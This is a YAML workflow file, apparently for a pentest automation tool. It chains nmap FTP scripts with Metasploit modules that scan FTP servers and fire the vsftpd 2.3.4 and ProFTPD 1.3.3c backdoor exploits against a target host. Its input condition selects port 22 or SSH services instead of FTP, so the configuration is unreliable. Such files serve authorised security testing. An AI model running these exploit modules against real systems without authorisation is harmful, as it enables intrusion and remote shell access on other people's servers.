type: workflow
name: ftp_exploit
alias: ftpexploit
description: Exploit FTP vulnerabilities
tags: [exploit, network, ftp]
input_types:
  - host
input_from_report:
  - type: port
    field: host
    condition: item.port == 22 or 'ssh' in item.service_name

tasks:
  _group/ftp:
    nmap:
      description: Run nmap ftp-* scripts
      scripts: 'ftp-*'
      skip_host_discovery: True
      version_detection: True

    msfconsole/ftp_version:
      description: Run FTP scanners
      execute_command: 'use auxiliary/scanner/ftp/ftp_version; run'

    msfconsole/ftp_anon:
      description: Check any FTP server for anonymous access
      execute_command: "use auxiliary/scanner/ftp/anonymous; exploit"

    msfconsole/ftp_backdoor:
      description: Check for FTP backdoor (version 2.3.4)
      execute_command: "use exploit/unix/ftp/vsftpd_234_backdoor; run"

    msfconsole/proftp_backdoor:
      description: Check for ProFTPD backdoor
      execute_command: "use unix/ftp/proftpd_133c_backdoor; run"

